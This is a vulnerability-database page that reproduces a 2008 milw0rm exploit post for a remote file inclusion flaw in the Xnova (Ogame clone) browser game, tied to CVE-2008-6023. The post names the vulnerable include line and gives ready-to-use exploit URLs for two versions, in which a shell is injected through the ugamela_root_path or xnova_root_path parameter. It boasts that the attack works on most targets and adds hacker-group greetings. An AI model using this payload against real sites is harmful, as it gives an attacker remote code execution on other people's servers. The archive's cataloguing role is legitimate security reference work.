Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2008-6023 CVE-2008-6022

Publish Date: 17 Aug 2008

                ##################################################################################################################################
Name: Xnova(Ogame) Remote File Inclusion
Author : NuclearHaxor
Contact MSN: nuclearhaxor@hotmail.com

homepage of xnova: http://xnova.fr/

Vuln file: includes/todofleetcontrol.php
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -&gt; but no declared ugamela_root_path ;)

Exploit(this exploit works in 90% targets):

------
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
or new version of xnova:
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
------

FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r &amp;&amp; Cr4wl aka Raz0r

##################################################################################################################################

# milw0rm.com [2008-08-17]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

XNova 0.8 sp1 - 'xnova_root_path' Remote File Inclusion

Vulmon Search

About

Products

Connect